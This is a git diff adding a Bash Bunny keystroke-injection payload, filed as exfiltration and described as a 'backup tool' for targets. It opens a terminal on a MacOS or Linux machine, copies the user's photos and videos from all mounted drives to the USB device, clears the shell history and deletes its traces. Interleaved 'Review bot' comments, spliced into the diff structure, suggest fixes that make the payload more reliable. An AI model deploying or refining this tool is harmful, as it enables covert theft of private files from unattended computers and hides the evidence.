diff --git a/payloads/library/exfiltration/HashSlingingStasher/README.md b/payloads/library/exfiltration/HashSlingingStasher/README.md
new file mode 100755
index 00000000..5138fffb
--- /dev/null
+++ b/payloads/library/exfiltration/HashSlingingStasher/README.md
@@ -0,0 +1,85 @@
+
+NNNNNNNNNNNNNNNX0kxol:;'.....     ...,:lkKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNNN0xl:,..                      .,:o0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNOl'.                              .,xXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNKo.                                   .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNN0:                                      .cKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNK;                                        .lKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNXc                                          .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNo.                                           ,ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNO'                                            .lXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNXc                                              ;0NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNO'                                              'ONNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNo                                               .;ccccccccccllloodxOXNNNNNNNNNNNNNN
+NK;                                     .....                        .cKNNNNNNNNNNNNN
+NO'                                                                   .xNNNNNNNNNNNNN
+Nx.                   H A S H                   .               ...   .ONNNNNNNNNNNNN
+Nd.                                             ......        .....   lXNNNNNNNNNNNNN
+Nl                 S L I N G I N G               ......       ...    ;0NNNNNNNNNNNNNN
+Xc                                                 ..               ,ONNNNNXK0KXNNNNN
+K;                  S T A S H E R                                 .cKNNNNN0dc;:cldkKX
+K,                                                              .:kXNNNNXxcdd:co:,,:o
+O'                       by                                  .;o0XNNNNNKocddcd0x::c;;
+k.                                                 ....',:ldkKNNNNNNNNOccoclkkl:oxl:x
+x.                     theSW4n                    .l0KKXNNNNNNNNNNNNNKl,:;lko:ldl:lOX
+d                                                 .lXNNNNNNNNNNNNNNNNX0o,,:::ol;cxKNN
+l                                                  .:ok0XXXK0OxdldKNNKxlldoc:;cxKNNNN
+c                                                     ..,;,'..    ;xdcoOXNNK00XNNNNNN
+;                                                                  .:OXNNNNNNNNNNNNNN
+,                                                                   lNNNNNNNNNNNNNNNN
+'                                                                   cXNNNNNNNNNNNNNNN
+.                                                               .':o0NNNNNNNNNNNNNNNN
+.           ..                                     ..''''',;:cox0XNNNNNNNNNNNNNNNNNNN
+            ..                                     .xNXXXXNNNNNNNNNNNNNNNNNNNNNNNNNNN
+           ...                                     .dNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+          ....                                     .xNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+.         ....                                   .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+Ko.       ......                            .';cd0XNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+Nk,.        .oKk,       ....';:col.        .;OXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNXOdl;..   'ONNd.      ....';cxXNl          .;dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNXOxl;oXNN0:.... .....',:xXN0l,........';dKNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNNNXXNNNNXK0OOOOO00KXXNNNNNNXXKKKKKKXXNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
+
+
+HSS is a data backup tool for MacOS and Linux targets (tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3) (not compatible with Windows). It is designed to find and copy user defined file types/sizes to the udisk on the Bash Bunny, and keep track of them using checksums. This allows the user to scan, stop, and revisit the target to resume copying only new files, skipping those previously copied.
+
+# Instructions
+
+If using a MicroSD XC card for your Bash Bunny Mark II, format it using FAT32 and name it "BashBunny".
+
+Variables/options are set in payload.txt. By default, the script will recursively search the root directory of the target OS for image and video file extensions and copy only files greater than 10KB in size.
+
+Copy the payload.txt and hss_bbscript.sh into the payload/switch folder on the Bash Bunny. If you have an existing checksums.txt file (a list of checksums for files which have been copied previously) you want to use, make sure to copy it to .../BashBunny/loot/hss/ on the Bash Bunny as well (or on the SD card if applicable). The list should contain one CRC-32 checksum per line.
+
+Backup checksums.txt after running HSS and name it something specific so that you know which target it corresponds to. You probably wouldn't want to use the same list on multiple targets, especially if there is a low chance of them containing the same files, because the script will take longer to parse the irrelevant checksums from the existing list. But this depends on your use case. If you want to return to a specific target at a later time, just copy and rename the corresponding checksums file back to "checksums.txt" in the loot directory, and pick up where you left off (looking for new/modified files).
+
+If the script completes its scan of the target system, it will create a file called "nosferatu" in the loot directory. Otherwise you may simply come back and run the HSS script again to resume scanning at any time. nosferatu is deleted at the beginning of each scan, if it exists on the Bash Bunny already.
+
+Unplug the Bash Bunny device when the script is finished, or at any time if you wish to return and finish later. You may now move the files off of the device for storage elsewhere, if desired. Leave the checksums.txt file inside the loot directory on the device if the script did not complete. The script will pick up where it left off, skipping over any files that were copied before (as long as checksums.txt is left on the device).
+
+# Nuances
+The tool will attempt to mount all connected disks and run as super user if possible (better results), unmounting whatever was not previously mounted before, once the script completes.
+
+If an unsupported filesystem is connected, you may instead run the script from a bootable USB OS attached to the target, which supports the desired filesystem.
+
+MacOS Time Machine backups and hidden ".Trashes" folders can not be accessed by running this script from the local machine running MacOS, unless full disk access has been granted to the termial application. You can do this relatively quickly (if you have the password to the user logged in) by pressing command + space, type "full disk access" and press return, then click the toggle to enable Terminal if it is not already enabled. Don't forget to turn it off afterwards if you go this route.
+
+If you unplug the Bash Bunny before the script finishes, and then modify payload.txt, you will have to manually delete the .../BashBunny/HSS directory for the changes to take effect.
+
+# LED Status Indicators (Standard)
+SETUP.... Magenta solid
+
+ATTACK... Yellow single blink
+
+FINISH... Green 1000ms VERY FAST blink followed by SOLID
+
+# hss_checksummer.sh
+### To manually generate or update your checksum list for files which you have already copied
+
+Manually run this script in the parent directory above a directory called "backup" containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run.
+
+# hss_cleanup.sh
+### To manually perform cleanup functions on the loot directory
+
+Manually run this script inside the .../loot/hss/ directory to unhide hidden files, and sort files into directories based on their file extension inside the loot directory.
diff --git a/payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh b/payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh
new file mode 100755
index 00000000..769cf69a
--- /dev/null
+++ b/payloads/library/exfiltration/HashSlingingStasher/hss_bbscript.sh
@@ -0,0 +1,76 @@
+#!/bin/bash
+
+# Variables (defined by user in payload.txt)
+mountpt=$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)
+lootdir=$mountpt/loot/hss
+
+###### Create loot directory and remove nosferatu if it already exists, which serves as the indicator whether or not the script has fully completed in the past ######
+
+mkdir -p $lootdir
+cd $lootdir
+rm nosferatu
+mkdir ./backup
+touch ./checksums.txt
+chmod 777 ./backup/ ./checksums.txt
+
+mounted=" "
+mntdir=" "
+
+###### Mount all unmounted, connected drives and store theier device name to unmount them again at the end of the script ######
+
+# For MacOS
+if uname | grep -i darwin; then for i in `ls /dev | awk -v s="disk" 'index($0, s) == 1'`; do if diskutil info $i | grep -i "Mounted" | grep -qi "Yes"; then :; else mounted+="$i " && diskutil mountDisk $i; fi; done; fi
+
+# For Linux
+if uname | grep -i darwin; then :; else
+partitions=$(lsblk -o NAME,MOUNTPOINT -nr)
+while IFS= read -r line; do
+ name=$(echo "$line" | awk '{print $1}')
+ mountpoint=$(echo "$line" | awk '{print $2}')
+ # Check if the partition is not mounted
+ if [ -z "$mountpoint" ]; then
+ # Attempt to mount the partition
+ udisksctl mount -b "/dev/$name" && mounted+="/dev/$name "
+ fi
+done <<< "$partitions"
+fi
+
+###### Find all files under a given directory of a given size and filetype, copy the files to a folder on the USB drive, and save their checksums to a running list ######
+find "$target_directory" -path "$mountpt/loot/hss" -prune -o -size $find_file_size -type f \( -name "" `for i in ${target_extensions[@]}; do echo "-o -iname "*.$i" "; done` \) -exec echo {} ';' | while read p; do
+ if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`; then
+ :
+ else
+ if [ -f "./backup/${p##*/}" ]; then
+ cp "$p" "./backup/`cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1`_${p##*/}"
+ if [ $? -ne 0 ] ; then
+ # Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script
+ touch ./disk_drive_full
+ if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
+ if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
+ exit 1
+ else
+ echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt
+ fi
+ else
+ cp "$p" "./backup/"
+ if [ $? -ne 0 ] ; then
+ # Provide indication the drive was full, and unmount only the disks that were mounted at the beginning of the script
+ touch ./disk_drive_full
+ if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
+ if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
+ exit 1
+ else
+ echo `cksum "$(echo "$p" | tr -d '\\\')" | cut -d ' ' -f1` >> ./checksums.txt
+ fi
+ fi
+ fi
+done
+
+###### Unmount only the disks that were mounted at the beginning of the script, and provide indication that the script completed successfully ######
+if [ $? -ne 0 ] ; then
+ :
+else
+ if uname | grep -i darwin; then for i in $mounted; do diskutil unmountDisk $i; done; fi
+ if uname | grep -i darwin; then :; else for i in $mounted; do udisksctl unmount -b $i; done; fi
+ touch nosferatu
+fi
diff --git a/payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh b/payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh
new file mode 100755
index 00000000..fbe19ead
--- /dev/null
+++ b/payloads/library/exfiltration/HashSlingingStasher/hss_checksummer.sh
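Review bot: `cd $lootdir` (tenth line of the hunk) is unchecked, and `mountpt` comes from an unquoted `grep -i $DRIVE_LABEL` over `mount` output, so when the labelled drive is not mounted (or the label matches more than one mount line) `lootdir` is empty or multi-word, `mkdir -p $lootdir` creates `/loot/hss` on the target's root filesystem, and every relative path that follows — `rm nosferatu`, `./backup`, `./checksums.txt`, the `cp` calls in the loop — operates there instead of on the udisk. A guard such as `[ -n "$mountpt" ] || exit 1` followed by `cd "$lootdir" || exit 1` stops the run before anything is written in the wrong place. The `find` expression is also assembled by word-splitting the output of a backtick `for` loop, so the unquoted `*.$i` patterns undergo pathname expansion in the current directory before `find` sees them; collecting the `-o -iname` arguments in a bash array and expanding it as `"${name_args[@]}"` avoids that. `while read p` should be `while IFS= read -r p` so paths containing backslashes or leading whitespace are read intact, which would also make the three `tr -d` calls unnecessary.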
@@ -0,0 +1,5 @@
+#!/bin/bash -x
+
+# Run this script in the parent directory above the "backup" folder containing files you want to add to a checksums.txt list. Then take the checksums.txt file and place it in .../loot/hss/ to prevent the files from being copied to the .../loot/hss/backups/ directory the next time HSS is run.
+
+find ./backup | while read p; do if cat ./checksums.txt | grep -qw `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1`; then : ; else echo `cksum "$(echo "$p" | tr -d '\')" | cut -d ' ' -f1` >> ./checksums.txt; fi; done
\ No newline at end of file
diff --git a/payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh b/payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh
new file mode 100755
index 00000000..17ad2d96
--- /dev/null
+++ b/payloads/library/exfiltration/HashSlingingStasher/hss_cleanup.sh
@@ -0,0 +1,7 @@
+#!/bin/bash -x
+
+# Run this script inside the .../loot/hss/ directory to perform cleanup functions on the loot directory: unhide hidden files, and sort files into directories based on their file extension
+
+find ./backup/ -type f -name '\.*' -print | while read p; do mv $p ./backup/`echo $p | cut -b 11-`; done
+ls ./backup/ | while read p; do mkdir ./backup/"${p##*.}"; done
+ls ./backup/ | while read p; do mv ./backup/"$p" ./backup/"${p##*.}"/; done
\ No newline at end of file
diff --git a/payloads/library/exfiltration/HashSlingingStasher/payload.txt b/payloads/library/exfiltration/HashSlingingStasher/payload.txt
new file mode 100755
index 00000000..5f40969a
--- /dev/null
+++ b/payloads/library/exfiltration/HashSlingingStasher/payload.txt
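Review bot: `find ./backup` in hss_checksummer.sh has no `-type f`, so the first path it emits is the `./backup` directory itself (plus any subdirectory), `cksum` reports an error and prints no sum for it, and the backtick substitution collapses to an empty `grep -qw` pattern whose result is not meaningful; the same empty value is then appended to checksums.txt as a blank line. `find ./backup -type f | while IFS= read -r p; do` restricts the loop to regular files and keeps `read` from mangling backslashes, at which point the `tr -d '\'` (a lone trailing backslash, which GNU tr flags as non-portable) can go. The checksum is also computed twice per file; assigning it once, `sum=$(cksum "$p" | cut -d ' ' -f1)`, and testing `$sum` is clearer and halves the forks. `#!/bin/bash -x` traces every command and file path to stderr and is silently dropped when the script is run as `bash hss_checksummer.sh`; if tracing is wanted it belongs in a `set -x` line inside the script.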
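Review bot: The first loop in hss_cleanup.sh passes `$p` unquoted to `mv`, so a hidden file whose name contains whitespace is split into several operands (ShellCheck SC2086), and the destination is derived with `cut -b 11-`, which hard-codes the byte length of the `./backup/.` prefix instead of stripping it. `mv -- "$p" "./backup/${p#./backup/.}"` does the rename without the subshell and without the fixed offset. The two `ls ./backup/ | while read p` loops that follow also iterate over the per-extension directories the first of them has just created and over names without a dot, for which `${p##*.}` is the whole name; those entries yield `mkdir` and `mv` errors on every run rather than a clean pass. A `[ -f "./backup/$p" ] || continue` test at the top of each loop body, and a `case "$p" in *.*) ;; *) continue ;; esac` guard, would limit the sorting to files that actually have an extension.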
@@ -0,0 +1,175 @@
+# Title: Hash Slinging Stasher for Bash Bunny
+# Description: Copies files to Bash Bunny udisk from the target OS matching given extensions and file size only if their checksum does not appear in a user defined or generated checksum list, and appends the checksum of copied files to that list.
+# Author: theSW4n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Tested on MacOS 13.x/14.0, Ubuntu 22.04.3 LTS, Manjaro 23.0.4, and Kali Linux 2023.3 (not compatible with Windows)
+# Attackmodes: HID, Storage
+
+# Options
+hss_target_directory=/
+hss_target_extensions="jpg jpeg gif bmp raw webp psd orf rw2 flv webm ogg h264 hevc heic heif dng cr2 tiff crw nef pef mov qt mp4 m4p m4v mpg mpe mpv m2v svi 3gp 3g2 mpeg avi wmv mts m2ts ts png"
+hss_find_file_size=+10k
+DRIVE_LABEL="BashBunny"
+
+######## SETUP PHASE ########
+LED SETUP
+GET SWITCH_POSITION
+mount /dev/nandf /root/udisk
+rm -rf /root/HSS
+cp -r /root/udisk/payloads/${SWITCH_POSITION} /root/HSS
+sync
+umount /dev/nandf
+udisk mount
+mv -f /root/HSS /root/udisk/HSS
+sync
+udisk umount
+ATTACKMODE HID STORAGE
+
+######## ATTACK PHASE ########
+LED ATTACK
+QUACK GUI SPACE
+QUACK GUI
+QUACK STRING "terminal"
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING "qterminal"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "gnome-terminal"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "xterm"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "konsole"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "lxterminal"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "urxvt"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "st"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "alacritty"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "xfce4-terminal"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "tilda"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "n"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "udisksctl mount -b /dev/disk/by-label/$DRIVE_LABEL"
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING "cp -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS /tmp"
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING "chmod -R 755 /tmp/HSS"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "cd /tmp/HSS"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "/bin/bash"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "target_directory=$hss_target_directory"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "export target_directory"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "target_extensions=\""$hss_target_extensions\"""
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "export target_extensions"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "find_file_size=$hss_find_file_size"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "export find_file_size"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "DRIVE_LABEL=$DRIVE_LABEL"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "export DRIVE_LABEL"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "if [ \""\$EUID\"" -ne 0 ]; then \$(find ~+ -name"
+QUACK STRING " \""hss_bbscript.sh\""); else \$(sudo \$(find ~+ -name"
+QUACK STRING " \""hss_bbscript.sh\"")); fi"
+QUACK ENTER
+QUACK DELAY 1000
+sync
+
+QUACK STRING "exit"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "export HISTIGNORE=\""*\"""
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "cd /"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "rm -rf /tmp/HSS"
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING "rm -rf \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)/HSS"
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING "udisksctl unmount -b /dev/disk/by-label/$DRIVE_LABEL"
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING "diskutil eject \$(mount | grep -i $DRIVE_LABEL | cut -d ' ' -f 3)"
+QUACK ENTER
+QUACK DELAY 2000
+QUACK STRING "unset target_directory & unset target_extensions & unset find_file_size & unset DRIVE_LABEL"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "history -c && history -w"
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING "killall qterminal & killall gnome-terminal- & killall Terminal & killall xterm & killall konsole & killall lxterminal & killall urxvt & killall st & killall alacritty & killall xfce4-terminal & killall tilda"
+QUACK ENTER
+QUACK DELAY 500
+sync
+
+LED FINISH
+
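Review bot: `mv -f /root/HSS /root/udisk/HSS` in the setup phase does not replace a staging directory left by an earlier interrupted run; when `/root/udisk/HSS` already exists, `mv` moves the fresh copy inside it as `/root/udisk/HSS/HSS`, which is exactly the behaviour the README's "manually delete the .../BashBunny/HSS directory" nuance asks the user to work around. An `rm -rf /root/udisk/HSS` placed right after `udisk mount`, mirroring the `rm -rf /root/HSS` a few lines earlier, makes the staged copy always reflect the current payload.txt and the README sentence can then be dropped. The three-part `QUACK STRING "if [ \""\$EUID\"" -ne 0 ]; then … else \$(sudo …); fi"` also only reaches its `sudo` branch when EUID is already 0, so the script always runs with the logged-in user's existing privileges; the README's "run as super user if possible" sentence should be reworded to say that, or the redundant `else` branch removed, so the documentation and the payload agree.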